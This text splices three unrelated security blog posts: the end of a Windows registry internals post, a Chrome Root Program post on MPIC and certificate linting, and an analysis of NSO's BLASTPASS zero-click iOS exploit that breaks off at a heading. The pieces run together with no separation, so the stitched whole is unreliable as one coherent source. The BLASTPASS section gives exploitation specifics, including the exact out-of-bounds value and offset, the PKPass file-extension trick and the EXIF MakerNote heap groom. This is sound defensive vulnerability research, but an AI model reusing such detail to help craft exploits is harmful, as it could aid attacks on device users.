!reg kcb: This command prints basic information about a key based on its KCB. Its advantage is that it translates flag names into their textual equivalents (e.g., CompressedName, NoDelete, HiveEntry, etc.), but it often doesn't provide the specific information one is looking for. In that case, it might be necessary to use the dt _CM_KEY_CONTROL_BLOCK command to dump the entire structure.
Other structures
So far, this blog post has described only a few of the most important registry structures, which are essential to know for anyone conducting research in this area.However, in total, there are over 150 different structures used in the Windows kernel and related to the registry, and only about half are documented through debug symbols or on Microsoft's website.While it's impossible to detail the operation and function of all of these structures in one article, this section aims to at least provide an overview of a majority of them, to note which of them are publicly available, and to briefly describe how they are used internally.
The layout of many structures corresponding to the most complex mechanisms is publicly unknown at the time of writing and requires significant time and energy to reconstruct.Even then, the correct meaning of each field and flag cannot be guaranteed.Therefore, the information below should be used with caution and verified against the specific Windows version(s) in question before relying on it in any way.
Key opening/creation
In PDB
Structure name
Description
❌
Parse context
Given that the registry is integrated with the standard Windows object model, all operations on registry paths (both absolute and relative) must be performed through the standard NT Object Manager interface.
For example, the NtCreateKey syscall calls the CmCreateKey helper function.At this point, there are no further calls to Configuration Manager, but instead, there is a call to ObOpenObjectByNameEx (a more advanced version of ObOpenObjectByName).Several levels down, the kernel will transfer execution back to the registry code, specifically to the CmpParseKey callback, which is the entry point responsible for handling all path operations (i.e., all key open/create actions).This means that the CmCreateKey and CmpParseKey functions, which work together, cannot pass an arbitrary number of input and output arguments to each other. They only have one pointer (ParseContext) at their disposal, which can serve as a communication channel.Thus, the agreement between these functions is that the pointer points to a special "parse context" structure, which has three main roles:
Pass the input configuration of a given operation, e.g. information about:
operation mode (open/create),
transactionality of the operation,
following of symbolic links,
flags related to WOW64 functionality,
optional class data of the created key.
Pass some return information, such as whether the key was opened or created,
Cache certain information within a single "parse" request, e.g.:
information on whether registry virtualization is enabled for a given process,
when following a symbolic link, a pointer to the originating hive descriptor, in order to check whether the given transition is allowed within the hive trust class,
when following a symbolic link, a pointer to the KCB of its target (or the closest possible ancestor).
Reconstructing the layout of this structure is a critical step in getting a better understanding of how the key opening/creation process works internally.
❌
Path info
When a client references a key by name, one of the first actions taken by the CmpParseKey function (or more specifically, CmpDoParseKey) is to take the string representing that name (absolute or relative), break it into individual parts separated by backslashes, and calculate the 32-bit hashes for each of them.This ensures that parsing only occurs once and doesn't need to be repeated.The structure where the result of this operation is stored is called "path info".
According to the documentation, a single registry path reference can contain a maximum of 32 levels of nesting.Therefore, the path info structure allows for the storage of 32 elements, in the following way: the first 8 elements being present directly within the structure, and if the path is deeply nested, an additional 24 elements within a supplementary structure allocated on-demand from kernel pools.The functions that operate on this object are CmpComputeComponentHashes, CmpExpandPathInfo, CmpValidateComponents, CmpGetComponentNameAtIndex, CmpGetComponentHashAtIndex, and CmpCleanupPathInfo.
Interestingly, I discovered an off-by-one bug in the CmpComputeComponentHashes function, which allows an attacker to write 25 values into a 24-element array.However, due to a fortunate coincidence, path info structures are allocated from a special lookaside list with allocation sizes significantly larger than the length of the structure itself.As a result, this buffer overflow is not exploitable in practice, which has also been confirmed by Microsoft.More information about this issue, as well as the reversed definition of this structure, can be found in myoriginal report.
Key notifications
In PDB
Structure name
Description
✅
_CM_NOTIFY_BLOCK
The first time RegNotifyChangeKeyValue or the underlying NtNotifyChangeMultipleKeys syscall is called on a given handle, a notify block structure is assigned to the corresponding key body object. This structure serves as the central control point for all notification requests made on that handle in the future. It also stores the configuration defined in the initial API call, which, once set, cannot be changed without closing and reopening the key. This is in line with the official MSDN documentation:
"This function should not be called multiple times with the same value for the hKey but different values for the bWatchSubtree and dwNotifyFilter parameters. The function will succeed but the changes will be ignored. To change the watch parameters, you must first close the key handle by calling RegCloseKey, reopen the key handle by calling RegOpenKeyEx, and then call RegNotifyChangeKeyValue with the new parameters."
The !reg notifylist command in WinDbg can list all active notify blocks in the system, allowing you to check which keys are currently being monitored for changes.
❌
Post block
Each post block object corresponds to a single wait for changes to a given key. Many post block objects can be assigned to one notify block object at the same time. The network of relationships in this structure becomes even more complex when using the NtNotifyChangeMultipleKeys syscall with a non-empty SubordinateObjects argument, in which case two separate post blocks share a third data structure (the so-called post block union). However, the details of this topic are beyond the scope of this post.
The WinDbg !reg postblocklist command allows you to see how many active post blocks are assigned to each process/thread, but unfortunately, it does not show any detailed information about their contents.
Registry callbacks
In PDB
Structure name
Description
✅
REG_*_INFORMATION
These structures are used for supplying callbacks with precise information about operations performed on the registry, and are part of the documented Windows interface.Consequently, not only their definitions but also detailed descriptions of the meaning of each field are published directly by Microsoft.A complete list of these structures can be found on MSDN, e.g., on the EX_CALLBACK_FUNCTION callback function (wdm.h) page.
However, I have found in my research that in addition to the official registry callback interface, there is also a less official extension that Microsoft uses internally in VRegDriver, the module that supports differencing hives.If a given client, instead of using the official CmRegisterCallbackEx function, calls the internal CmpRegisterCallbackInternal function with the fifth argument set to 1, this callback will be internally marked as "extended".Extended callbacks, in addition to the information provided by the standard structures, also receive a handful of additional information related to differencing hives and layered keys.At the time of writing, the differences occur in the structures representing the RegNtPreLoadKey, RegNtPreCreateKeyEx, RegNtPreOpenKeyEx actions and their "post" counterparts.
❌
Callback descriptor
The structure represents a single registry callback registered through the CmRegisterCallback or CmRegisterCallbackEx API. Once allocated, it is attached to a double-linked list represented by the global CallbackListHead object.
❌
Object context descriptor
A descriptor structure for a key body-specific context that can be assigned through the CmSetCallbackObjectContext API. This descriptor is then inserted into a linked list that starts at _CM_KEY_BODY.ContextListHead.
❌
Callback context
An internal structure used in the CmpCallCallBacksEx function to store the current state during the callback invocation process.For example, it's used to invoke the appropriate "post" type callbacks in case of an error in one of the "pre" type callbacks.These objects are freed by the dedicated CmpFreeCallbackContext function, which additionally caches a certain number of allocations in the global CmpCallbackContextSList list.This allows future requests for objects of this type to be quickly fulfilled.
Registry virtualization
In PDB
Structure name
Description
❌
Replication stack
A core task of registry virtualization is the replication of keys, which involves creating an identical copy of a given key structure.This occurs under the path HKU\<SID>_Classes\VirtualStore when an application, subject to virtualization, attempts to create a key in a location where it lacks proper permissions.The entire operation is coordinated by the CmpReplicateKeyToVirtual function and consists of two main stages.First, a "replication stack" object is created and initialized in the CmpBuildVirtualReplicationStack function.This object specifies the precise key structure to be created within the virtualization process.Second, the actual creation of these keys based on this object occurs within the CmpDoBuildVirtualStack function.
Transactions
In PDB
Structure name
Description
✅
_KTRANSACTION
A structure corresponding to a KTM transaction object, which is created by the CreateTransaction function or its low-level equivalent NtCreateTransaction.
❌
Lightweight transaction object
A direct counterpart of _KTRANSACTION, but for lightweight transactions, created by the NtCreateRegistryTransaction system call. It is very simple and only consists of a bitmask of the current transaction state, a push lock for synchronization, and a pointer to the corresponding _CM_TRANS object.
✅
_CM_KCB_UOW
The structure represents a single, active transactional operation linked to a specific key.In some scenarios, one logical operation corresponds to one such object (e.g., the UoWSetSecurityDescriptor type).In other cases, multiple UoWs are created for a single operation (e.g., UoWAddThisKey assigned to a newly created key, and UoWAddChildKey assigned to its parent).
This critical structure has multiple functions.The key ones are connecting to KCB intent locks and keeping any pending state related to a given operation, both before and during the transaction commit phase.
✅
_CM_UOW_*
Auxiliary sub-structures of _CM_KCB_UOW, which store information about the temporary state of the registry associated with a specific type of transactional operation. Specifically, the four structures are: _CM_UOW_KEY_STATE_MODIFICATION, _CM_UOW_SET_SD_DATA, _CM_UOW_SET_VALUE_KEY_DATA and _CM_UOW_SET_VALUE_LIST_DATA.
✅
_CM_TRANS
A descriptor of a specific registry transaction, usually associated with a particular hive.In special cases, if operations are performed on multiple hives within a single transaction, then multiple _CM_TRANS objects may exist for it.Given the address of the _CM_TRANS object, it is possible to list all operations associated with this transaction in WinDbg using the !reg uowlist command.
✅
_CM_RM
A descriptor of a specific resource manager.It only exists if the given hive has KTM transactions enabled, and never exists for app hives or hives loaded with the REG_HIVE_NO_RM flag.
Think of this structure as being associated with one set of .blf / .regtrans-ms log files, which usually means one _CM_RM structure is assigned to one hive.The exception is system hives (e.g. SOFTWARE, SYSTEM etc.) which all share the same resource manager that exists under the CmRmSystem global variable.
Given the address of a _CM_RM object in WinDbg, you can list all associated transactions using the !reg translist command.
✅
_CM_INTENT_LOCK
This structure represents an intent lock, with two instances (KCBLock and KeyLock) residing in the KCB. Their primary function is to ensure key consistency by preventing the assignment of two different transactions that contain conflicting modifications of a key.Given the object's address, WinDbg's !reg ixlock command can display some details about it.
❌
Serialized log records
KTM transacted registry operations are logged to .blf files on disk to enable consistent state restoration in case of unexpected shutdown during transaction commit.The CmAddLogForAction function serializes the _CM_KCB_UOW object into a flat buffer and writes it to the log file using the CLFS interface.While the _CM_KCB_UOW structure can be found in public symbols, their corresponding serialized representations cannot.Notably, there was an information disclosure vulnerability (CVE-2023-28271) that was directly related to these structures.
❌
Rollback packet
When a client performs a non-transactional operation that modifies a key, and there's an active transaction associated with that key, the transaction must be rolled back before the operation can be executed to prevent an inconsistent state.This is achieved using a structure that contains a list of transactions to be rolled back.This structure is passed to the CmpAbortRollbackPacket function, which carries out the rollback.Although the official layout of this structure is unknown, in practice it is quite simple, consisting of three fields: the current capacity, the current fill level of the list, and a pointer to a dynamically allocated array of transactions.
Differencing hives (VRegDriver)
In PDB
Structure name
Description
❌
IOCTL input structures
The VRegDriver module works by creating the \Device\VRegDriver device, and communicates with its clients by supporting nine distinct IOCTLs within the corresponding VrpIoctlDeviceDispatch handler function.These IOCTLs, exclusively accessible to administrator users, facilitate loading and unloading differencing hives, configuring registry redirections for specific containers, and a few other operations.Each IOCTL requires a specific input data structure, none of which are officially documented.Therefore, practical use of this interface necessitates reverse engineering the required structures to understand their initialization.An example of a reversed structure, corresponding to IOCTL 0x220008 and provisionallynamed VRP_LOAD_DIFFERENCING_HIVE_INPUT, was showcased in blog post #4.This enabled the creation of a proof-of-concept exploit for a differencing hive vulnerability (CVE-2023-36404), demonstrating the ability to load custom hives and, consequently, expose the flaw.
❌
Silo context
This silo-specific context structure is set by the VRegDriver during silo initialization using the PsInsertPermanentSiloContext function.It is later retrieved by PsGetPermanentSiloContext and used during both IOCTL handling and path translation for containerized processes.A brief analysis suggests that it primarily contains the GUID of the associated silo, a push lock used for synchronization, and a user-configured list of namespaces for the given container, which is a set of source and target paths between which redirection should occur.
❌
Key context
This structure stores the context specific to a particular key being subject to path translation within a silo.It is usually allocated for each key opened within the context of a containerized process, and assigned to its key body using the CmSetCallbackObjectContext API. It primarily stores the original path of the key before translation—as the client believes it has access to—and several other auxiliary fields.
❌
Callback context (open/create)
The callback-specific context structure stores shared data between "pre" and "post" callbacks for a given operation.This context is generally accessed through the CallContext field within the REG_*_INFORMATION structure relevant to the specific operation.In practice, VRegDriver only has one instance of a special structure defined for this purpose, used when handling the RegNtPreCreateKeyEx/RegNtPreOpenKeyEx callbacks.It saves specific data (RootObject, CompleteName, RemainingName) before the open/create request, to restore their original values in the "post" callback.
❌
Extra parameter
This structure also appears to be used for temporarily storing the original key path during translation. However, its scope encompasses the entire key creation/opening process, rather than just a single callback.This means it can store information across callbacks, even when symbolic links or write-through hives are encountered during path traversal, causing the CmpParseKey function to return STATUS_REPARSE or STATUS_REPARSE_GLOBAL and restart the path lookup process.Although the concept of a whole operation context seems broadly applicable, currently there is only one type of "extra parameter" being used, represented by the GUID VRP_ORIGINAL_KEY_NAME_PARAMETER_GUID {85b8669a-cfbb-4ac0-b689-6daabfe57722}.
Layered keys
In PDB
Structure name
Description
✅
_CM_KCB_LAYER_INFO
This is likely the only structure related to layered keys whose definition is public.It is part of every KCB and contains information about the placement of the key in the global, "vertical" tree of layered key instances.In practice, this means that it stores a pointer to the KCB at one level lower (its parent, so to speak), and the head of a linked list with KCBs at one level higher (KCB.LayerHeight+1), if any exist.
❌
Key node stack
A stack containing all instances of a given layered key, starting from its level all the way down to level zero (the base key).Each key in this structure is represented by a (Hive, KeyCell) pair.If the key actually exists at a given level (KeyCell ≠ -1, indicating a state other than Merge-Unbacked), it is also represented by a direct, resolved pointer to its _CM_KEY_NODE structure.
Since Windows 10 introduced support for layered keys, many places in the code that previously identified a single key as _CM_KEY_NODE* now require passing the entire key node stack structure.This is because operations on layered keys usually require knowledge of the state of lower level keys (e.g. their layered semantics, subkeys, values), not just the key represented by the handle used by the caller.
Places where the key node stack structure is used can be identified by calls to its related helper functions, such as those for initialization (CmpInitializeKeyNodeStack) and cleanup (CmpCleanupKeyNodeStack), as well as any others containing the string "KeyNodeStack".
❌
KCB stack
This structure, analogous to the key node stack, represents keys using KCBs.Its use is most clearly revealed by references to the CmpStartKcbStack and CmpStartKcbStackForTopLayerKcb functions in code, though many other internal routines with "KcbStack" in their names also operate on it.
Both the KCB stack and the key node stack share an optimization where the first two levels are stored inline, with additional levels allocated in kernel pools only when necessary.This is likely due to the fact that most systems, even those with layered keys, typically only use one level of nesting (two levels total). Thus, this optimization avoids costly memory allocation and deallocation in these common scenarios.
❌
Enum stack
This data structure allows for the enumeration of subkeys within a given layered key.Its primary use is within the CmpEnumerateLayeredKey function, which serves as the handler for the NtEnumerateKey operation specifically for layered keys.At an even higher level, this corresponds to the RegEnumKeyExW API function.The complexity of this structure is evident by the fact that there are 19 internal helper functions, all starting with the name CmpKeyEnumStack, that operate on it.
❌
Enum resume context
This data structure, directly tied to the subkey enumeration, primarily serves as an optimization mechanism.After executing a specific number (N) of enumeration steps, it stores the internal state of the enum stack.This allows subsequent requests for subkey N+1 to resume the enumeration process from the previous point, bypassing the need to repeat the initial steps.Linked to a specific handle, it is stored within _CM_KEY_BODY.EnumerationResumeContext.
The KCB.SequenceNumber field, directly related to this structure, monitors whether a given key has significantly changed since a previous point in time.This enables the CmpKeyEnumStackVerifyResumeContext helper function to determine if the current registry state is consistent enough for the existing enumeration resume context to be used for further enumeration, or if the entire process needs to be restarted.
❌
Value enum stack
This data structure, used to enumerate values for layered keys, is similarly complex as those used to list subkeys.The main function utilizing it is CmEnumerateValueFromLayeredKey.Additionally, there are 10 helper functions named CmpValueEnumStack[...] that operate on this structure.
❌
Sorted value enum stack
The structure is similar to the standard value enum stack, but is used to iterate over the values of a given layered key while preserving lexicographical order. Helper functions from the CmpSortedValueEnumStack[...] family (9 in total) correspond to this structure.This functionality is used exclusively in the CmpGetValueCountForKeyNodeStack function, which is responsible for returning the number of values for a given key.
The reason for the existence of this mechanism in parallel with the regular "value enum stack" is not entirely clear, but I suspect it serves as an optimization for value counting operations.This is supported by the fact that while layered keys first appeared in Windows 10 1607 (Redstone, build 14393), the sorted value enum stack was not introduced until the later version of Windows 10 1703 (Redstone 2, build 15063). In the first iteration of the layered key implementation, CmpGetValueCountForKeyNodeStack was implemented using the standard value enum stack.This lends credibility to the hypothesis that these mechanisms are functionally equivalent, but the "sorted" version is faster at counting unique values when direct access to them is not required.
❌
Subtree enumerator
This structure enables the enumeration of both the direct subkeys of a layered key and all its deeper descendants.It is relatively complex, and its associated functions begin with CmpSubtreeEnumerator[...] (also 9 in total).This mechanism is primarily needed to implement the "rename" operation on layered keys.First, it allows verification that the caller has KEY_READ and DELETE permissions for all descendant keys in the subtree, and second, it enables setting the LayerSemantics value for these descendants to Supersede-Tree (0x3).
❌
Discard/replace context
This data structure is employed during key deletion to ensure that KCB structures corresponding to higher-level Merge-Unbacked keys reliant on the deleted key are also marked as deleted.Subsequently, "fresh" KCB objects representing the non-existent key are inserted into the tree in their place.The two primary functions associated with this mechanism are CmpPrepareDiscardAndReplaceKcbAndUnbackedHigherLayers and CmpCommitDiscardAndReplaceKcbAndUnbackedHigherLayers.
Conclusion
The goal of this post was to provide a thorough overview of the structures used in the Configuration Manager subsystem in Windows, with particular emphasis on the most important and frequently used ones, i.e. those describing hives and keys.I wanted to share this knowledge because there are not many publicly available sources that accurately describe the registry's operation from the implementation side, especially relevant to the most recent code developments in Windows 10 and 11.I would also like to once again use this opportunity to appeal to Microsoft to make more information available through public PDB symbols – this would greatly facilitate the work of security researchers in the future.
This post concludes the part of the series focusing solely on the inner workings of the registry.In the next, seventh installment, we will shift our perspective and examine the registry's role in the overall security of the system, with a deep focus on vulnerability research. Stay tuned!
Posted by Chrome Root Program, Chrome Security Team
The Chrome Root Program launched in 2022 as part of Google’s ongoing commitment to upholding secure and reliable network connections in Chrome. We previously described how the Chrome Root Program keeps users safe, and described how the program is focused on promoting technologies and practices that strengthen the underlying security assurances provided by Transport Layer Security (TLS). Many of these initiatives are described on our forward looking, public roadmap named “Moving Forward, Together.”
At a high-level, “Moving Forward, Together” is our vision of the future. It is non-normative and considered distinct from the requirements detailed in the Chrome Root Program Policy. It’s focused on themes that we feel are essential to further improving the Web PKI ecosystem going forward, complementing Chrome’s core principles of speed, security, stability, and simplicity. These themes include:
Encouraging modern infrastructures and agility
Focusing on simplicity
Promoting automation
Reducing mis-issuance
Increasing accountability and ecosystem integrity
Streamlining and improving domain validation practices
Preparing for a "post-quantum" world
Earlier this month, two “Moving Forward, Together” initiatives became required practices in the CA/Browser Forum Baseline Requirements (BRs). The CA/Browser Forum is a cross-industry group that works together to develop minimum requirements for TLS certificates. Ultimately, these new initiatives represent an improvement to the security and agility of every TLS connection relied upon by Chrome users.
If you’re unfamiliar with HTTPS and certificates, see the “Introduction” of this blog post for a high-level overview.
Multi-Perspective Issuance Corroboration
Before issuing a certificate to a website, a Certification Authority (CA) must verify the requestor legitimately controls the domain whose name will be represented in the certificate. This process is referred to as "domain control validation" and there are several well-defined methods that can be used. For example, a CA can specify a random value to be placed on a website, and then perform a check to verify the value’s presence has been published by the certificate requestor.
Despite the existing domain control validation requirements defined by the CA/Browser Forum, peer-reviewed research authored by the Center for Information Technology Policy (CITP) of Princeton University and others highlightedtherisk of Border Gateway Protocol (BGP) attacks and prefix-hijacking resulting in fraudulently issued certificates. This risk was not merely theoretical, as it was demonstrated that attackers successfully exploited this vulnerability on numerous occasions, with just one of these attacks resulting in approximately $2 million dollars of direct losses.
Multi-Perspective Issuance Corroboration (referred to as "MPIC") enhances existing domain control validation methods by reducing the likelihood that routing attacks can result in fraudulently issued certificates. Rather than performing domain control validation and authorization from a single geographic or routing vantage point, which an adversary could influence as demonstrated by security researchers, MPIC implementations perform the same validation from multiple geographic locations and/or Internet Service Providers. This has been observed as an effective countermeasure against ethically conducted, real-world BGP hijacks.
The Chrome Root Program led a work team of ecosystem participants, which culminated in a CA/Browser Forum Ballot to require adoption of MPIC via Ballot SC-067. The ballot received unanimous support from organizations who participated in voting. Beginning March 15, 2025, CAs issuing publicly-trusted certificates must now rely on MPIC as part of their certificate issuance process. Some of these CAs are relying on the Open MPIC Project to ensure their implementations are robust and consistent with ecosystem expectations.
We’d especially like to thank Henry Birge-Lee, Grace Cimaszewski, Liang Wang, Cyrill Krähenbühl, Mihir Kshirsagar, Prateek Mittal, Jennifer Rexford, and others from Princeton University for their sustained efforts in promoting meaningful web security improvements and ongoing partnership.
Linting
Linting refers to the automated process of analyzing X.509 certificates to detect and prevent errors, inconsistencies, and non-compliance with requirements and industry standards. Linting ensures certificates are well-formatted and include the necessary data for their intended use, such as website authentication.
Linting can expose the use of weak or obsolete cryptographic algorithms and other known insecure practices, improving overall security. Linting improves interoperability and helps CAs reduce the risk of non-compliance with industry standards (e.g., CA/Browser Forum TLS Baseline Requirements). Non-compliance can result in certificates being "mis-issued". Detecting these issues before a certificate is in use by a site operator reduces the negative impact associated with having to correct a mis-issued certificate.
There are numerous open-source linting projects in existence (e.g., certlint, pkilint, x509lint, and zlint), in addition to numerous custom linting projects maintained by members of the Web PKI ecosystem. “Meta” linters, like pkimetal, combine multiple linting tools into a single solution, offering simplicity and significant performance improvements to implementers compared to implementing multiple standalone linting solutions.
Last spring, the Chrome Root Program led ecosystem-wide experiments, emphasizing the need for linting adoption due to the discovery of widespread certificate mis-issuance. We later participated in drafting CA/Browser Forum Ballot SC-075 to require adoption of certificate linting. The ballot received unanimous support from organizations who participated in voting. Beginning March 15, 2025, CAs issuing publicly-trusted certificates must now rely on linting as part of their certificate issuance process.
What’s next?
We recently landed an updated version of the Chrome Root Program Policy that further aligns with the goals outlined in “Moving Forward, Together.” The Chrome Root Program remains committed to proactive advancement of the Web PKI. This commitment was recently realized in practice through our proposal to sunsetdemonstrated weak domain control validation methods permitted by the CA/Browser Forum TLS Baseline Requirements. The weak validation methods in question are now prohibited beginning July 15, 2025.
It’s essential we all work together to continually improve the Web PKI, and reduce the opportunities for risk and abuse before measurable harm can be realized. We continue to value collaboration with web security professionals and the members of the CA/Browser Forum to realize a safer Internet. Looking forward, we’re excited to explore a reimagined Web PKI and Chrome Root Program with even stronger security assurances for the web as we navigate the transition to post-quantum cryptography. We’ll have more to say about quantum-resistant PKI later this year.
On September 7, 2023 Apple issued an out-of-band security update for iOS:
Around the same time on September 7th 2023, Citizen Lab published a blog post linking the two CVEs fixed in iOS 16.6.1 to an "NSO Group Zero-Click, Zero-Day exploit captured in the wild":
"[The target was] an individual employed by a Washington DC-based civil society organization with international offices...
The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim.
The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."
The day before, on September 6th 2023, Apple reported a vulnerability to the WebP project, indicating in the report that they planned to ship a custom fix for Apple customers the next day.
The WebP team posted their first proposed fix in the public git repo the next day, and five days after that on September 12th Google released a new Chrome stable release containing the WebP fix. Both Apple and Google marked the issue as exploited in the wild, alerting other integrators of WebP that they should rapidly integrate the fix as well as causing the security research community to take a closer look...
A couple of weeks later on September 21st 2023, former Project Zero team lead Ben Hawkes (in collaboration with @mistymntncop) published the first detailed writeup of the root cause of the vulnerability on the Isosceles Blog. A couple of months later, on November 3rd, a group called Dark Navy published their first blog post: a two-part analysis (Part 1 - Part 2) of the WebP vulnerability and a proof-of-concept exploit targeting Chrome (CVE-2023-4863).
Whilst the Isosceles and Dark Navy posts explained the underlying memory corruption vulnerability in great detail, they were unable to solve another fascinating part of the puzzle: just how exactly do you land an exploit for this vulnerability in a one-shot, zero-click setup? As we'll soon see, the corruption primitive is very limited. Without access to the samples it was almost impossible to know.
In mid-November, in collaboration with Amnesty International Security Lab, I was able to obtain a number of BLASTPASS PKPass sample files as well as crash logs from failed exploit attempts.
This blog post covers my analysis of those samples and the journey to figure out how one of NSO's recent zero-click iOS exploits really worked. For me that journey began by immediately taking three months of paternity leave, and resumed in March 2024 where this story begins:
Setting the scene
For a detailed analysis of the root-cause of the WebP vulnerability and the primitive it yields, I recommend first reading the three blog posts I mentioned earlier (Isosceles, Dark Navy 1, Dark Navy 2.) I won't restate their analyses here (both because you should read their original work, and because it's quite complicated!) Instead I'll briefly discuss WebP and the corruption primitive the vulnerability yields.
WebP
WebP is a relatively modern image file format, first released in 2010. In reality WebP is actually two completely distinct image formats: a lossy format based on the VP8 video codec and a separate lossless format. The two formats share nothing apart from both using a RIFF container and the string WEBP for the first chunk name. From that point on (12 bytes into the file) they are completely different. The vulnerability is in the lossless format, with the RIFF chunk name VP8L.
Lossless WebP makes extensive use of Huffman coding; there are at least 10 huffman trees present in the BLASTPASS sample. In the file they're stored as canonical huffman trees, meaning that only the code lengths are retained. At decompression time those lengths are converted directly into a two-level huffman decoding table, with the five largest tables all getting squeezed together into the same pre-allocated buffer. The (it turns out not quite) maximum size of these tables is pre-computed based on the number of symbols they encode. If you're up to this part and you're slightly lost, the other three blogposts referenced above explain this in detail.
With control over the symbol lengths it's possible to define all sorts of strange trees, many of which aren't valid. The fundamental issue was that the WebP code only checked the validity of the tree after building the decoding table. But the pre-computed size of the decoding table was only correct for valid trees.
As the Isosceles blog post points out, this means that a fundamental part of the vulnerability is that triggering the bug is detected, though after memory has been corrupted, and image parsing stops only a few lines of code later. This presents another exploitation mystery: in a zero-click context, how do you exploit a bug where every time the issue is triggered it also stops parsing any attacker-controlled data?
The second mystery involves the actual corruption primitive. The vulnerability will write a HuffmanCode structure at a known offset past the end of the huffman tables buffer:
// Huffman lookup table entry
typedef struct {
uint8_t bits;
uint16_t value;
} HuffmanCode;
As DarkNavy point out, whilst the bits and value fields are nominally attacker-controlled, in reality there isn't that much flexibility. The fifth huffman table (the one at the end of the preallocated buffer, part of which can get written out-of-bounds) only has 40 symbols, limiting value to a maximum value of 39 (0x27) and bits will be between 1 and 7 (for a second-level table entry). There's a padding byte between bits and value which makes the largest value that could be written out-of-bounds 0x00270007. And it just so happens that that's exactly the value which the exploit does write — and they likely didn't have that much choice about it.
There's also not much flexibility in the huffman table allocation size. The table allocation in the exploit is 12072 (0x2F28) bytes, which will get rounded up to fit within a 0x3000 byte libmalloc small region. The code lengths are chosen such that the overflow occurs like this:
To summarize: The 32-bit value 0x270007 will be written 0x58 bytes past the end of a 0x3000 byte huffman table allocation. And then WebP parsing will fail, and the decoder will bail out.
Déjà vu?
Long-term readers of the Project Zero blog might be experiencing a sense of déjà vu at this point... haven't I already written a blog post about an NSO zero-click iPhone zero day exploiting a vulnerability in a slightly obscure lossless compression format used in an image parsed from an iMessage attachment?
BLASTPASS has many similarities with FORCEDENTRY, and my initial hunch (which turned out to be completely wrong) was that this exploit might take a similar approach to build a weird machine using some fancier WebP features. To that end I started out by writing a WebP parser to see what features were actually used.
Transformation
In a very similar fashion to JBIG2, WebP also supports invertible transformations on the input pixel data:
My initial theory was that the exploit might operate in a similar fashion to FORCEDENTRY and apply sequences of these transformations outside of the bounds of the image buffer to build a weird machine. But after implementing enough of the WebP format in python to parse every bit of the VP8L chunk it became pretty clear that it was only triggering the Huffman table overflow and nothing more. The VP8L chunk was only 1052 bytes, and pretty much all of it was the 10 Huffman tables needed to trigger the overflow.
What's in a pass?
Although BLASTPASS is often referred to as an exploit for "the WebP vulnerability", the attackers don't actually just send a WebP file (even though that is supported in iMessage). They send a PassKit PKPass file, which contains a WebP. There must be a reason for this. So let's step back and actually take a look at one of the sample files I received:
171K sample.pkpass
$ file sample.pkpass
sample.pkpass: Zip archive data, at least v2.0 to extract, compression method=deflate
There are five files inside the PKPass zip archive:
60K background.png
5.5M logo.png
175B manifest.json
18B pass.json
3.3K signature
The 5.5MB logo.png is the WebP image, just with a .png extension instead of .webp:
$ file logo.png:
logo.png: RIFF (little-endian) data, Web/P image
The closest thing to a specification for the PKPass format appears to be the Wallet Developer Guide, and whilst it doesn't explicitly state that the .png files should actually be Portable Network Graphics images, that's presumably the intention. This is yet another parallel with FORCEDENTRY, where a similar trick was used to reach the PDF parser when attempting to parse a GIF.
PKPass files require a valid signature which is contained in manifest.json and signature. The signature has a presumably fake name and more timestamps indicating that the PKPass is very likely being generated and signed on the fly for each exploit attempt.
Curious. Another file with a misleading extension; this time a TIFF file with a .png extension.
We'll return to this TIFF later in the analysis as it plays a critical role in the exploit flow, but for now we'll focus on the WebP, with one short diversion:
Blastdoor
So far I've only mentioned the WebP vulnerability, but the Apple advisory I linked at the start of this post mentions two separate CVEs:
The first, CVE-2023-41064 in ImageIO, is the WebP bug (though just to keep things confusing with a different CVE from the upstream WebP fix which is CVE-2023-4863 - they're the same vulnerability though).
The second, CVE-2023-41061 in "Wallet", is described in the Apple advisory as: "A maliciously crafted attachment may result in arbitrary code execution".
"Citizen Lab called this attack "BLASTPASS", since the attackers found a clever way to bypass the "BlastDoor" iMessage sandbox. We don't have the full technical details, but it looks like by bundling an image exploit in a PassKit attachment, the malicious image would be processed in a different, unsandboxed process. This corresponds to the first CVE that Apple released, CVE-2023-41061."
This theory makes sense — FORCEDENTRY had a similar trick where the JBIG2 bug was actually exploited inside IMTranscoderAgent instead of the more restrictive sandbox of BlastDoor. But in all my experimentation, as well as all the in-the-wild crash logs I've seen, this hypothesis doesn't seem to hold.
The PKPass file and the images enclosed within do get parsed inside the BlastDoor sandbox and that's where the crashes occur or the payload executes — later on we'll also see evidence that the NSExpression payload which eventually gets evaluated expects to be running inside BlastDoor.
My guess is that CVE-2023-41061 is more likely referring to the lax parsing of PKPasses which didn't reject images which weren't png's.
In late 2024, I received another set of in-the-wild crash logs including two which do in fact strongly indicate that there was also a path to hit the WebP vulnerability in the MobileSMS process, outside the BlastDoor sandbox! Interestingly, the timestamps indicate that these devices were targeted in November 2023, two months after the vulnerability was patched.
In those cases the WebP code was reached inside the MobileSMS process via a ChatKitCKPassPreviewMediaObject created by a CKAttachmentMessagePartChatItem.
What's in a WebP?
I mentioned that the VP8L chunk in the WebP file is only around 1KB. Yet in the file listing above the WebP file is 5.5MB! So what's in the rest of it? Expanding out my WebP parser we see that there's one more RIFF chunk:
EXIF : 0x586bb8
exif is Intel byte alignment
EXIF has n_entries=1
tag=8769 fmt=4 n_components=1 data=1a
subIFD has n_entries=1
tag=927c fmt=7 n_components=586b8c data=2c
It's a (really really huge) EXIF - the standard format which cameras use to store image metadata — stuff like the camera model, exposure time, f-stop etc.
It's a tag-based format and pretty much all 5.5MB is inside one tag with the id 0x927c. So what's that?
Looking through an online list of EXIF tags just below the lens FocalLength tag and above the UserComment tag we spot 0x927c:
It's the very-vague-yet-fascinating sounding: "MakerNote - Manufacturer specific information."
"the "MakerNote" tag contains information normally in a proprietary binary format."
Modifying the webp parser to now dump out the MakerNote tag we see:
$ file sample.makernote
sample.makernote: Apple binary property list
Apple's chosen format for the "proprietary binary format" is binary plist!
And indeed: looking through the ImageIO library in IDA there's a clear path between the WebP parser, the EXIF parser, the MakerNote parser and the binary plist parser.
unbplisting
I covered the binary plist format in a previous blog post. That was the second time I'd had to analyse a large bplist. The first time (for the FORCEDENTRY sandbox escape) it was possible mostly by hand, just using the human-readable output of plutil. Last year, for the Safari sandbox escape analysis, the bplist was 437KB and I had to write a custom bplist parser to figure out what was going on. Keeping the exponential curve going this year the bplist was 10x larger again.
In this case it's fairly clear that the bplist must be a heap groom - and at 5.5MB, presumably a fairly complicated one. So what's it doing?
Switching Views
